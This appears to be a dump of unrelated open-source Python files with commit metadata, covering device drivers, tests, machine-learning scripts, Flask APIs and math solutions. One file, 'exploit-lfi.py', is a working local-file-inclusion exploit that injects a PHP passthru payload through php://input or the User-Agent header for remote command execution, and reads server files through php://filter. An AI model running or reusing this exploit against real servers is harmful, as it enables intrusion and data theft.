## Copyright (C) 2007 Async Open Source <http://www.async.com.br>
## All rights reserved
##
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307,
## USA.
##
## Author(s): Johan Dahlin <jdahlin@async.com.br>
##
import optparse
import sys
from kiwi.python import namedAny
from stoqdrivers.devices.serialbase import SerialPort
def main(args):
usage = "usage: %prog [options] command [args]"
parser = optparse.OptionParser(usage=usage)
parser.add_option('-t', '--type',
action="store",
dest="type",
default="printers",
help='Device type')
parser.add_option('-b', '--brand',
action="store",
dest="brand",
help='Device brand')
parser.add_option('-m', '--model',
action="store",
dest="model",
help='Device model')
parser.add_option('-p', '--port',
action="store",
dest="port",
default="/dev/ttyS0",
help='Printer port')
options, args = parser.parse_args(args)
if len(args) < 2:
raise SystemExit("Need a command")
driver = namedAny('stoqdrivers.devices.%s.%s.%s.%s' % (
options.type, options.brand, options.model, options.model))
device = driver(port=SerialPort(options.port))
command = args[1]
cb = getattr(device, command)
args = map(int, tuple(args[2:]))
retval = cb(*args)
if retval is not None:
print '%s returned: %r' % (command, retval)
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv))
| lgpl-2.1 | Python | |
fb08ad77a821d86a3049628d907577949d525dac | Add unittests to test environment.py methods | Telefonica/toolium,Telefonica/toolium,Telefonica/toolium | toolium/test/behave/test_environment.py | toolium/test/behave/test_environment.py | # -*- coding: utf-8 -*-
u"""
Copyright 2016 Telefónica Investigación y Desarrollo, S.A.U.
This file is part of Toolium.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
import mock
from ddt import ddt, data, unpack
from nose.tools import assert_equal
from toolium.behave.environment import get_jira_key_from_scenario
tags = (
(["jira('PROJECT-32')"], 'PROJECT-32'),
(["jira=PROJECT-32"], 'PROJECT-32'),
(["jira(PROJECT-32)"], 'PROJECT-32'),
(["jira='PROJECT-32'"], 'PROJECT-32'),
(["jiraPROJECT-32"], 'PROJECT-32'),
(["jira"], None),
(["PROJECT-32"], None),
(['slow', "jira('PROJECT-32')", 'critical'], 'PROJECT-32'),
(['slow', "PROJECT-32", 'critical'], None),
(['slow', "jira('PROJECT-32')", "jira('PROJECT-33')"], 'PROJECT-32'),
)
@ddt
class EnvironmentTests(unittest.TestCase):
@data(*tags)
@unpack
def test_get_jira_key_from_scenario(self, tag_list, jira_key):
scenario = mock.Mock()
scenario.tags = tag_list
# Extract Jira key and compare with expected key
assert_equal(jira_key, get_jira_key_from_scenario(scenario))
| apache-2.0 | Python | |
032876577fa94e2d9ca668d6fe108d725696088b | add 20newsgroups/ml.py | arosh/ml | 20newsgroups/ml.py | 20newsgroups/ml.py | from __future__ import division, print_function, unicode_literals
import numpy
from sklearn.datasets import fetch_20newsgroups_vectorized
from sklearn.preprocessing import StandardScaler
from sklearn.naive_bayes import MultinomialNB
from sklearn.linear_model import SGDClassifier
from sklearn.svm import LinearSVC
from sklearn.grid_search import RandomizedSearchCV
def best_cv_num(n):
return int(1+numpy.log2(n))
def best_n_iter(n):
return numpy.ceil(10**6 / n)
if __name__ == '__main__':
d = fetch_20newsgroups_vectorized(
remove=('headers', 'footers', 'quotes'))
X = d.data
X = StandardScaler(with_mean=False).fit_transform(X)
#X = TruncatedSVD(n_components=400).fit_transform(X)
y = d.target
_n = X.shape[0]
#clf = MultinomialNB()
#params = {
# 'alpha': numpy.linspace(0,0.1,1000)
#}
# http://scikit-learn.org/stable/modules/sgd.html#tips-on-practical-use
#clf = SGDClassifier(n_iter=best_n_iter(_n))
#params = {
# 'alpha': 10**numpy.linspace(-7,-1)
#}
clf = LinearSVC()
params = {
'C': 2**numpy.linspace(-3,3)
}
cv = RandomizedSearchCV(clf, params, n_iter=20, cv=best_cv_num(_n), n_jobs=-1, verbose=3)
cv.fit(X, y)
print(cv.best_score_)
print(cv.best_params_)
| mit | Python | |
63a0a0347272b2ae19f9caa5200aca5c03d67bab | add userselfinfo | OmegaEinstein/opsdev,OmegaEinstein/opsdev | api/user.py | api/user.py | #coding:utf-8
from flask import Flask
from . import app, jsonrpc
import json
from auth import auth_login
@jsonrpc.method('user.getinfo')
@auth_login
def userselfinfo(auth_info, **kwargs):
username = auth_info['username']
fields = ['id','username','name','email','mobile','is_lock','r_id']
try:
user = app.config['db'].get_one_result('user', fields, where={'username':username})
if user.get('r_id', None):
r_id = user['r_id'].split(',')
rids = app.config['db'].get_results('role', ['id','name','p_id'], where={'id': r_id})
else:
rids = {}
pids = []
for x in rids:
pids += x['p_id'].split(',')
pids = list(set(pids)) #去重,通过用户名查到角色id,再通过角色id取到用户权限id
user['r_id'] = [x['name'] for x in rids]
if pids: #将用户到权限id转为权限名
mypids = app.config['db'].get_results('power', ['id', 'name', 'name_cn', 'url'], where={'id': pids})
user['p_id'] = dict([(str(x['name']), dict([(k, x[k]) for k in ('name_cn','url')])) for x in mypids]) #返回格式:{'git':{'name_cn':'git','url':'http://git.com'},......}
else:
user['p_id'] = {}
return json.dumps({'code':0, 'user':user})
except:
return json.dumps({'code':1, 'errmsg':"get userinfo failed"})
| mit | Python | |
c43000d2f9ec20a1c0cdbbec86270d88acb36104 | Add implementation of more generic store calls | ktbs/ktbs-bench,ktbs/ktbs-bench | bench_examples/sparqlstore.py | bench_examples/sparqlstore.py | from ktbs_bench.graph_store import GraphStore
import rdflib
rdflib.plugin.register('BN', rdflib.store.Store, 'ktbs_bench.bnsparqlstore', 'SPARQLUpdateStore')
def get_sparqlstore(query_endpoint, update_endpoint, identifier="http://localhost/generic_sparqlstore/"):
triple_store = GraphStore(store='BN', identifier=identifier,
connect_args={'configuration': (query_endpoint, update_endpoint)})
return triple_store
| mit | Python | |
a6c96caa1392868402be9f89db034ef664a12bda | Add open time range support. | google/ctfscoreboard,google/ctfscoreboard,google/ctfscoreboard,google/ctfscoreboard | utils.py | utils.py | import datetime
import flask
import functools
from app import app
# Use dateutil if available
try:
from dateutil import parser as dateutil
except ImportError:
dateutil = None
class GameTime(object):
@classmethod
def setup(cls):
"""Get start and end time."""
cls.start, cls.end = app.config.get('GAME_TIME', (None, None))
if isinstance(cls.start, basestring):
cls.start = cls._parsedate(cls.start)
if isinstance(cls.end, basestring):
cls.end = cls._parsedate(cls.end)
@classmethod
def countdown(cls, end=False):
"""Time remaining to start or end."""
until = cls.end if end else cls.start
if until is None:
return None
return until - datetime.datetime.utcnow()
@classmethod
def open(cls, after_end=False):
"""Is the game open? If after_end, keeps open."""
now = datetime.datetime.utcnow()
if cls.start and cls.start > now:
return False
if after_end:
return True
if cls.end and cls.end < now:
return False
return True
@classmethod
def require_open(cls, f, after_end=False):
@functools.wraps(f)
def wrapper(*args, **kwargs):
if cls.open(after_end):
return f(*args, **kwargs)
flask.abort(403)
return wrapper
@staticmethod
def _parsedate(datestr):
if dateutil:
return dateutil.parse(datestr)
# TODO: parse with strptime
raise RuntimeError('No parser available.')
GameTime.setup()
require_gametime = GameTime.require_open
@app.context_processor
def util_contexts():
return dict(gametime=GameTime)
| apache-2.0 | Python | |
135645a91d08267a0cc04b5c5840ac9c84af03b5 | Add pytorch_CAM.py file for Lecture 05 | jastarex/DeepLearningCourseCodes,jastarex/DeepLearningCourseCodes | 05_Image_recognition_and_classification/pytorch_CAM.py | 05_Image_recognition_and_classification/pytorch_CAM.py | # simple implementation of CAM in PyTorch for the networks such as ResNet, DenseNet, SqueezeNet, Inception
import io
import requests
from PIL import Image
from torchvision import models, transforms
from torch.autograd import Variable
from torch.nn import functional as F
import numpy as np
import cv2
# input image
LABELS_URL = 'https://s3.amazonaws.com/outcome-blog/imagenet/labels.json'
IMG_URL = 'http://media.mlive.com/news_impact/photo/9933031-large.jpg'
# networks such as googlenet, resnet, densenet already use global average pooling at the end, so CAM could be used directly.
model_id = 1
if model_id == 1:
net = models.squeezenet1_1(pretrained=True)
finalconv_name = 'features' # this is the last conv layer of the network
elif model_id == 2:
net = models.resnet18(pretrained=True)
finalconv_name = 'layer4'
elif model_id == 3:
net = models.densenet161(pretrained=True)
finalconv_name = 'features'
net.eval()
# hook the feature extractor
features_blobs = []
def hook_feature(module, input, output):
features_blobs.append(output.data.cpu().numpy())
net._modules.get(finalconv_name).register_forward_hook(hook_feature)
# get the softmax weight
params = list(net.parameters())
weight_softmax = np.squeeze(params[-2].data.numpy())
def returnCAM(feature_conv, weight_softmax, class_idx):
# generate the class activation maps upsample to 256x256
size_upsample = (256, 256)
bz, nc, h, w = feature_conv.shape
output_cam = []
for idx in class_idx:
cam = weight_softmax[class_idx].dot(feature_conv.reshape((nc, h*w)))
cam = cam.reshape(h, w)
cam = cam - np.min(cam)
cam_img = cam / np.max(cam)
cam_img = np.uint8(255 * cam_img)
output_cam.append(cv2.resize(cam_img, size_upsample))
return output_cam
normalize = transforms.Normalize(
mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]
)
preprocess = transforms.Compose([
transforms.Scale((224,224)),
transforms.ToTensor(),
normalize
])
response = requests.get(IMG_URL)
img_pil = Image.open(io.BytesIO(response.content))
img_pil.save('test.jpg')
img_tensor = preprocess(img_pil)
img_variable = Variable(img_tensor.unsqueeze(0))
logit = net(img_variable)
# download the imagenet category list
classes = {int(key):value for (key, value)
in requests.get(LABELS_URL).json().items()}
h_x = F.softmax(logit).data.squeeze()
probs, idx = h_x.sort(0, True)
# output the prediction
for i in range(0, 5):
print('{:.3f} -> {}'.format(probs[i], classes[idx[i]]))
# generate class activation mapping for the top1 prediction
CAMs = returnCAM(features_blobs[0], weight_softmax, [idx[0]])
# render the CAM and output
print('output CAM.jpg for the top1 prediction: %s'%classes[idx[0]])
img = cv2.imread('test.jpg')
height, width, _ = img.shape
heatmap = cv2.applyColorMap(cv2.resize(CAMs[0],(width, height)), cv2.COLORMAP_JET)
result = heatmap * 0.3 + img * 0.5
cv2.imwrite('CAM.jpg', result)
| apache-2.0 | Python | |
a11a32f754a356dfc008e69b62d930af3754aec4 | Add : LFI Exploit tool | m101/m101-tools | exploit-lfi.py | exploit-lfi.py | #!/usr/bin/python
import argparse
import base64
import re
import requests
import sys
def scrap_results (content):
# regexp
regexp_start = re.compile ('.*STARTSTART.*')
regexp_end = re.compile ('.*ENDEND.*')
# results
results = list()
# result start and end
found_start = False
found_end = False
# getting lines
lines = content.split ('\n')
for line in lines:
if found_start and found_end:
break
if found_start == False and len (regexp_start.findall (line)) != 0:
# print 'found STARTSTART'
line = re.sub ('.*STARTSTART', '', line)
found_start = True
if found_start == True and found_end == False and len (regexp_end.findall (line)) != 0:
# print 'found ENDEND'
line = re.sub ('ENDEND.*', '', line)
found_end = True
if found_start == True and len (line) != 0:
results.append (line)
return results
# extract all potential base64 strings
# decode correct one and store potentials
def scrap_b64str (content):
# search for base64 strings, shorter than 16 chars is refused
regexp_b64 = re.compile ('[A-Za-z0-9+/=]{16,}=+')
words = regexp_b64.findall (content)
# validate each base64
# if validated it is added to our list
results = list()
for word in words:
found = True
decoded = ''
try:
decoded = base64.b64decode (word)
except Exception:
found = False
if found == False and len (re.findall ('=+$', word)) != 0:
decoded = word
found = True
if found == True and len (decoded) != 0:
results.append (decoded)
return results
parser = argparse.ArgumentParser(description='Exploit LFI')
parser.add_argument('--url', '-u', nargs=1, type=str, help='URL to attack', required=True)
parser.add_argument('--arg', '-a', nargs=1, type=str, help='Technique argument', required=True)
parser.add_argument('--technique', '-t', nargs=1, default='env', help='input, env or read')
args = parser.parse_args ()
payload = '<?php echo "STARTSTART"; passthru ("{0}"); echo "ENDEND"; ?>'.format (args.arg[0])
if args.technique[0] == 'input':
form = {
'' : payload
}
filename = 'php://input'
url = args.url[0].replace ('PAYLOAD', filename)
req = requests.get (url, data=form)
# print result
results = scrap_results (req.text)
for result in results:
print result
elif args.technique[0] == 'read':
php_filter = 'php://filter/convert.base64-encode/resource=' + args.arg[0]
url = args.url[0].replace ('PAYLOAD', php_filter)
req = requests.get (url)
# print result
results = scrap_b64str (req.text)
for result in results:
print result
else:
headers = {
'User-Agent' : payload
}
filename = '/proc/self/environ'
url = args.url[0].replace ('PAYLOAD', filename)
print url
req = requests.get (url, headers=headers)
# print result
results = scrap_results (req.text)
for result in results:
print result
| agpl-3.0 | Python | |
70f48f8b72a49929ddba7908fd47175fd4c1685d | add yarn support (test failing) | Ron89/thesaurus_query.vim | autoload/thesaurus_query/backends/yarn_synsets_lookup.py | autoload/thesaurus_query/backends/yarn_synsets_lookup.py | # Thesaurus Lookup routine for local synsets.csv file.
# Author: HE Chong [[chong.he.1989@gmail.com][E-mail]]
'''
Lookup routine for local mthesaur.txt file. When query_from_source is called, return:
[status, [[def_0, [synonym_0, synonym_1, ...]], [def_1, [synonym_0, synonym_1, ...]], ...]]
status:
0: normal, synonym found, list will be returned as
1: normal, synonym not found, return empty synonym list
-1: unexpected result from query, return empty synonym list
synonym list = [def, list wordlist]
def('str'): definition the synonyms belong to
wordlist = [synonym_0, synonym_1, ...]: list of words belonging to a same definition
'''
import os
from ..tq_common_lib import decode_utf_8, get_variable
identifier="yarn_synsets"
language="ru"
def query(word):
_synsets_valid , _synsets_file = _synsets_file_locate()
if not _synsets_valid:
return [-1, []]
match_found = 0
thesaur_file = open(os.path.expanduser(_synsets_file), 'r')
found_synList=[]
while True:
line_curr=decode_utf_8(thesaur_file.readline())
if not line_curr:
break
line_data = line_curr.rstrip().split(u',')
synonym_list = line_data[1].split(u';')
if len(line_data):
grammar = "{0}, ".format(line_data[2])
else:
grammar = ""
wordDomain = line_data[3]
if word in synonym_list:
synonym_list.remove(word)
else:
continue
if len(synonym_list):
found_synList.append([
u"{0}{1}".format(grammar, wordDomain), synonym_list])
return [0 if len(found_synList) else 1, found_synList]
def _synsets_file_locate():
verified_file = get_variable(
"yarn_synsets_file",
"~/.vim/thesaurus/yarn_synsets.csv")
if os.path.exists(os.path.expanduser(verified_file)):
return (True, verified_file)
return (False, None)
# initiation ------------
_synsets_file_locate()
| apache-2.0 | Python | |
b036acb164bc0efce18299341b04a7acf226c7db | solve pep_745 | filippovitale/pe,filippovitale/pe,filippovitale/pe,filippovitale/pe | pe-solution/src/main/python/pep_745.py | pe-solution/src/main/python/pep_745.py | from collections import defaultdict
from math import sqrt
MODULO = 1_000_000_007
def g_naive(n: int) -> int:
"""maximum perfect square that divides n."""
upper = int(sqrt(n))
for i in range(0, upper):
sq = (upper - i) ** 2
if n % sq == 0:
return sq % MODULO
def s_naive(nn: int) -> int:
return sum([g_naive(n) for n in range(1, nn + 1)]) % MODULO
def solve(n: int) -> int:
upper = int(sqrt(n))
t = defaultdict(int)
for i in range(upper, 0, -1):
t[i] = n // (i * i) - sum([t[i * j] for j in range(2, upper // i + 1)])
return (sum([i * i * v for i, v in t.items()])) % MODULO
if __name__ == "__main__":
assert g_naive(18) == 9
assert g_naive(19) == 1
assert solve(10) == 24
assert solve(100) == 767
print(solve(10 ** 14))
| mit | Python | |
a59d07a5bfb9f32c37242fd8ffb06d0409896485 | add a welch periodogram tool | evandromr/python_scitools | welch.py | welch.py | #!/bin/env python
import numpy as np
import scipy.signal as ss
import astropy.io.fits as fits
import matplotlib.pyplot as plt
inpt = str(raw_input("Nome do Arquivo: "))
lc = fits.open(inpt)
bin = float(raw_input("bin size (or camera resolution): "))
# Convert to big-endian array is necessary to the lombscargle function
rate = np.array(lc[1].data["RATE"], dtype='float64')
time = np.array(lc[1].data["TIME"], dtype='float64')
time -= time.min()
# Exclue NaN values -------------------------
print ''
print 'Excluding nan and negative values...'
print ''
exclude = []
for i in xrange(len(rate)):
if rate[i] > 0:
pass
else:
exclude.append(i)
exclude = np.array(exclude)
nrate = np.delete(rate, exclude)
ntime = np.delete(time, exclude)
# --------------------------------------------
# normalize count rate
nrate -= nrate.mean()
# maximum frequecy limited by resolution
freqmax = 1.0/bin
# Ther periodogram itself
f, p = ss.welch(nrate, fs=freqmax, nperseg=len(nrate), nfft=10*len(nrate))
# Plot lightcurve on top panel
plt.subplot(2, 1, 1)
plt.plot(ntime, nrate, 'bo-')
plt.xlabel('Time [s]', fontsize=12)
plt.ylabel('Normalized Count Rate [counts/s]', fontsize=12)
# Plot powerspectrum on bottom panel
plt.subplot(2, 1, 2)
plt.plot(f, p, 'b.-', label='f = {0}'.format(f[np.argmax(p)]))
plt.xlabel('Frequency [Hz]', fontsize=12)
plt.ylabel('Power', fontsize=12)
plt.legend(loc='best')
# show plot
plt.show()
| mit | Python | |
f204c881aabb07dbe6f04008e0637dc4430ae8c8 | Add jon submission for problem 01 | lypnol/graph-theory | problem-01/submissions/jon.py | problem-01/submissions/jon.py | from submission import Submission
import collections
import random
class JonSubmission(Submission):
def author(self):
return 'jon'
def run(self, input):
class Traveler(object):
def __init__(self, graph, start_point):
if start_point not in graph:
raise Exception("Start point not in the graph")
self._graph = graph
self._current = start_point
self._history = [start_point]
def possibilities(self):
return self._graph[self._current]
def goto(self, position):
if position in self.possibilities():
self._current = position
self._history.append(position)
else:
raise Exception("Not possible, try again.")
def current(self):
return self._current
def step_count(self):
return len(self._history) - 1
def travel_path(self):
return list(self._history)
class ShuffledTraveler(Traveler):
def __init__(self, graph, start_point):
super().__init__(graph, start_point)
def possibilities(self):
l = super().possibilities()[:]
random.shuffle(l)
return l
def connected_component_using_shorter_dfs(traveler):
visited = {traveler.current()}
found = set(traveler.possibilities())
found.add(traveler.current())
path = [] # Path to the starting point
while len(visited) < len(found):
new_found = False
for node in traveler.possibilities():
# Ignore already visited nodes to avoid loops !
if node not in visited:
path.append(traveler.current())
traveler.goto(node)
new_found = True
break
if not new_found:
if len(path) > 0:
traveler.goto(path.pop())
else:
break
visited.add(traveler.current())
found.update(traveler.possibilities())
return visited
graph, start = input
traveler = ShuffledTraveler(graph, start)
connected_component_using_shorter_dfs(traveler)
return traveler.travel_path()
| mit | Python | |
9999c27f5a6121d8488c14dd4a2b9843eef9cec9 | Add merge migration | aapris/linkedevents,City-of-Helsinki/linkedevents,City-of-Helsinki/linkedevents,aapris/linkedevents,aapris/linkedevents,City-of-Helsinki/linkedevents | events/migrations/0030_merge.py | events/migrations/0030_merge.py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.10 on 2016-09-27 09:05
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('events', '0029_make_api_key_non_nullable'),
('events', '0028_add_photographer_name'),
]
operations = [
]
| mit | Python | |
aa0e10116580ab013e911c2b14cf216a19716abd | Add schedule to static renderers | CTPUG/wafer,CTPUG/wafer,CarlFK/wafer,CarlFK/wafer,CTPUG/wafer,CarlFK/wafer,CarlFK/wafer,CTPUG/wafer | wafer/schedule/renderers.py | wafer/schedule/renderers.py | from django_medusa.renderers import StaticSiteRenderer
class ScheduleRenderer(StaticSiteRenderer):
def get_paths(self):
paths = ["/schedule/", ]
return paths
renderers = [ScheduleRenderer, ]
| isc | Python | |
51d3dee22c3c563b486038edcd9f18fa02b46448 | Add new admin views to show how to use RBAC system | andreffs18/flask-template-project,andreffs18/flask-template-project,andreffs18/flask-template-project | project/admin/views.py | project/admin/views.py | from werkzeug.exceptions import HTTPException
from flask import Response, redirect
from flask_admin import BaseView, expose
from flask_admin.contrib.sqla import ModelView as DefaultModelView
from flask_login import login_required
from project.home.decorators import roles_required
class BasicAuthException(HTTPException):
def __init__(self, message):
super().__init__(message, Response(
"You could not be authenticated. Please refresh the page.", 401,
{'WWW-Authenticate': 'Basic realm="Login Required"'}
))
class ModelView(DefaultModelView):
column_auto_select_related = True
def __init__(self, model, session, basic_auth, *args, **kwargs):
super(ModelView, self).__init__(model, session, *args, **kwargs)
self.basic_auth = basic_auth
def is_accessible(self):
if not self.basic_auth.authenticate():
raise BasicAuthException('Not authenticated.')
else:
return True
def inaccessible_callback(self, name, **kwargs):
return redirect(self.basic_auth.challenge())
class SuperSecretPage(BaseView):
@expose(url="/", methods=("GET", ))
@login_required
@roles_required('admin')
def secret(self):
return self.render('admin/super-secret-page.html')
| mit | Python | |
46074336a9ffc8a566a88a8e70c37ca56635ff7d | Create app2.py | belmih/simpleworks | python/pla.rix/app2.py | python/pla.rix/app2.py | #!C:/Python35/python.exe
# -*- coding: UTF-8 -*-
#
# belmih 2016
#
from multiprocessing import Process, Queue, Lock
import os
import xml.etree.cElementTree as ET
import shutil
import zipfile
import time
import csv
import argparse
abspath = os.path.abspath(__file__)
workdir = os.path.dirname(abspath)
os.chdir(workdir)
CSV_ID_LEVEL = "id_level.csv"
CSV_ID_OBJECT = "id_object_name.csv"
UNZIPFOLDER = './unzip'
DELETEXML = True
# create new csv file
def create_new_file(filename, fieldnames):
with open(filename, 'w', newline='') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
def print_lock(s,lock):
lock.acquire()
try:
print(s)
finally:
lock.release()
# write csv file
def write_csv(filename, fieldnames, data, lock):
lock.acquire()
try:
with open(filename, 'a', newline='') as csvfile:
writer = csv.DictWriter(csvfile, dialect='excel', fieldnames=fieldnames)
writer.writerow(data)
finally:
lock.release()
def unzip_archive(item):
tmpfoldername = os.path.basename(item).split('.')[0]
tmpfolderpath = os.path.join('unzip', tmpfoldername)
zfile = zipfile.ZipFile(item)
for name in zfile.namelist():
(dirname, filename) = os.path.split(name)
dirnamepath = os.path.join(tmpfolderpath, dirname)
if not os.path.exists(dirnamepath):
os.makedirs(dirnamepath)
zfile.extract(name, dirnamepath)
return tmpfolderpath
# xml parser and writer csv
def parse_xml(xmlfile, lock):
tree = ET.parse(xmlfile)
root = tree.getroot()
id = root.findall("./var[@name='id']")[0].get('value')
level = root.findall("./var[@name='level']")[0].get('value')
write_csv(CSV_ID_LEVEL, ['id', 'level'], {'id': id, 'level': level}, lock)
for obj in root.findall('./objects/object'):
for key, value in obj.items():
write_csv(CSV_ID_OBJECT, ['id', 'object_name'], {'id': id, 'object_name': value}, lock)
def remove_unzip_folder():
if DELETEXML and os.path.exists(UNZIPFOLDER):
shutil.rmtree(UNZIPFOLDER)
# process worker
def worker(quezip, lock):
while True:
item = quezip.get()
if (item == 'STOP'):
break
print_lock(item,lock)
tmpfolderpath = unzip_archive(item)
# find all xml
for root, dirs, files in os.walk(tmpfolderpath):
for file in files:
if file.endswith(".xml"):
f = os.path.join(root, file)
parse_xml(f, lock)
def main():
parser = argparse.ArgumentParser(description='Do *.csv files.')
parser.add_argument('-p', type=int, help='count processes', default=2)
args = parser.parse_args()
countprocesses = args.p
start = time.perf_counter()
print(os.getcwd())
create_new_file(CSV_ID_LEVEL, ['id', 'level'])
create_new_file(CSV_ID_OBJECT, ['id', 'object'])
remove_unzip_folder()
lock = Lock()
quezip = Queue()
# Submit tasks
for root, dirs, files in os.walk("zip"):
for file in files:
zf = os.path.normpath(os.path.join(root, file))
quezip.put(zf)
processes = []
for i in range(countprocesses):
p = Process(target=worker, args=(quezip, lock))
p.start()
processes.append(p)
# Tell child processes to stop
for i in range(countprocesses):
quezip.put('STOP')
for p in processes:
p.join()
remove_unzip_folder()
print('time:', time.perf_counter() - start)
if __name__ == '__main__':
main()
| mit | Python | |
68babe2de9a8204c46ad23e1c82dd0ff8fe44c94 | Add a unittest on plot_figs module. | jeremiedecock/pyarm,jeremiedecock/pyarm | pyarm/tests/test_plot_figs.py | pyarm/tests/test_plot_figs.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2010 Jérémie DECOCK (http://www.jdhp.org)
import unittest
import os
import sys
dirname = os.path.dirname(__file__)
if dirname == '':
dirname = '.'
dirname = os.path.realpath(dirname)
updir = os.path.split(dirname)[0]
if updir not in sys.path:
sys.path.append(updir)
###
import plot_figs
class PlotFigsTest(unittest.TestCase):
def setUp(self):
pass
def test_main(self):
try:
plot_figs.main()
except:
self.fail()
def tearDown(self):
# Remove files
files = ("arm_Kambara_c_forearm.png", "muscle_Kambara_k.png",
"muscle_Kambara_lr.png", "muscle_Li_fa.png",
"muscle_Li_fl.png", "muscle_Li_nf.png",
"muscle_Mitrovic_lm.png", "muscle_Mitrovic_v.png",
"arm_Mitrovic_c_forearm.png", "muscle_Kambara_lm.png",
"muscle_Kambara_v.png", "muscle_Li_fe.png",
"muscle_Li_fv.png", "muscle_Mitrovic_k.png",
"muscle_Mitrovic_lr.png")
try:
map(os.remove, files)
except:
pass
###
def test_suite():
tests = [unittest.makeSuite(PlotFigsTest)]
return unittest.TestSuite(tests)
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
| mit | Python | |
f34fb2b060c7fd977ca50753c8c1c9d5beaf0516 | return index at which acf drops below thresh | isomerase/RoboSkeeter,isomerase/mozziesniff | agent_model/acfanalyze.py | agent_model/acfanalyze.py | __author__ = 'richard'
import os
import numpy as np
import pandas as pd
from glob import glob
import statsmodels.tsa
import statsmodels.graphics.tsaplots
import matplotlib.pyplot as plt
plt.style.use('ggplot')
TRAJECTORY_DATA_DIR = "experimental_data/control_trajectories/"
def make_csv_name_list():
# TODO export this to io
print "Loading + filtering CSV files from ", TRAJECTORY_DATA_DIR
os.chdir(TRAJECTORY_DATA_DIR)
csv_list = sorted([os.path.splitext(file)[0] for file in glob("*.csv")])
os.chdir(os.path.dirname(__file__)) # go back to old dir
return csv_list
def load_trajectory_dynamics_csv(data_fname):
file_path = os.path.join(os.getcwd(), TRAJECTORY_DATA_DIR, data_fname + ".csv")
col_labels = [
'pos_x',
'pos_y',
'pos_z',
'velo_x',
'velo_y',
'velo_z',
'accel_x',
'accel_y',
'accel_z',
'heading_angle',
'angular_velo_xy',
'angular_velo_yz',
'curvature'
]
dyn_trajectory_DF = pd.read_csv(file_path, na_values="NaN", names=col_labels) # recognize string as NaN
dyn_trajectory_DF.fillna(value=0, inplace=True)
return dyn_trajectory_DF
def arg_less(inarray,threshold):
filtered = np.nonzero(inarray<threshold)
return np.nonzero(inarray<threshold)[0][0] # return index of first item that is under thresh
csv_list = make_csv_name_list()
for csv_name in csv_list:
df = load_trajectory_dynamics_csv(csv_name)
print csv_name, 'size/timesteps = ', df.size
if not os.path.exists('./correlation_figs/{data_name}'.format(data_name = csv_name)):
os.makedirs('./correlation_figs/{data_name}'.format(data_name = csv_name))
for label, col in df.iteritems():
if label in ['velo_x', 'velo_y', 'velo_z']:
acf = statsmodels.tsa.stattools.acf(col, nlags = 70)
print label, arg_less(acf, .5) | mit | Python | |
96ca06b93aa33fbe779a6e7c6c85439e5b62b1a8 | Add `pysymoro/screw6.py` | galou/symoro,ELZo3/symoro,symoro/symoro,galou/symoro,symoro/symoro,ELZo3/symoro | pysymoro/screw6.py | pysymoro/screw6.py | # -*- coding: utf-8 -*-
"""
This module contains the Screw6 data structure.
"""
from sympy import zeros
from sympy import ShapeError
class Screw6(object):
"""
Data structure:
Represent the data structure (base class) to hold a 6x6 matrix
which in turn contains four 3x3 matrices.
"""
def __init__(self, *args, **kwargs):
"""Constructor period."""
self._val = zeros(6, 6)
@property
def val(self):
"""
Get current value.
Returns:
A 6x6 Matrix with the current value
"""
return self._val
@val.setter
def val(self, value):
"""
Set the current value.
Args:
value: A 6x6 Matrix
"""
if value.rows != 6 or value.cols != 6:
raise ShapeError("Matrix size has to be 6x6.")
self._val = value
@property
def topleft(self):
"""
Get the top-left part of the 6x6 matrix.
Returns:
A 3x3 Matrix.
"""
return self._val[0:3, 0:3]
@property
def topright(self):
"""
Get the top-right part of the 6x6 matrix.
Returns:
A 3x3 Matrix.
"""
return self._val[0:3, 3:6]
@property
def botleft(self):
"""
Get the bottom-left part of the 6x6 matrix.
Returns:
A 3x3 Matrix.
"""
return self._val[3:6, 0:3]
@property
def botright(self):
"""
Get the bottom-right part of the 6x6 matrix.
Returns:
A 3x3 Matrix.
"""
return self._val[3:6, 3:6]
@topleft.setter
def topleft(self, value):
"""
Set the top-left part of the 6x6 matrix.
Args:
value: A 3x3 Matrix - top-left value.
"""
if value.rows != 3 or value.cols != 3:
raise ShapeError("Top-left value size has to be 3x3.")
self._val[0:3, 0:3] = value
@topright.setter
def topright(self, value):
"""
Set the top-right part of the 6x6 matrix.
Args:
value: A 3x3 Matrix - top-right value.
"""
if value.rows != 3 or value.cols != 3:
raise ShapeError("Top-right value size has to be 3x3.")
self._val[0:3, 3:6] = value
@botleft.setter
def botleft(self, value):
"""
Set the bottom-left part of the 6x6 matrix.
Args:
value: A 3x3 Matrix - bottom-left value.
"""
if value.rows != 3 or value.cols != 3:
raise ShapeError("Bottom-left value size has to be 3x3.")
self._val[3:6, 0:3] = value
@botright.setter
def botright(self, value):
"""
Set the bottom-right part of the 6x6 matrix.
Args:
value: A 3x3 Matrix - bottom-right value.
"""
if value.rows != 3 or value.cols != 3:
raise ShapeError("Bottom-right value size has to be 3x3.")
self._val[3:6, 3:6] = value
| mit | Python | |
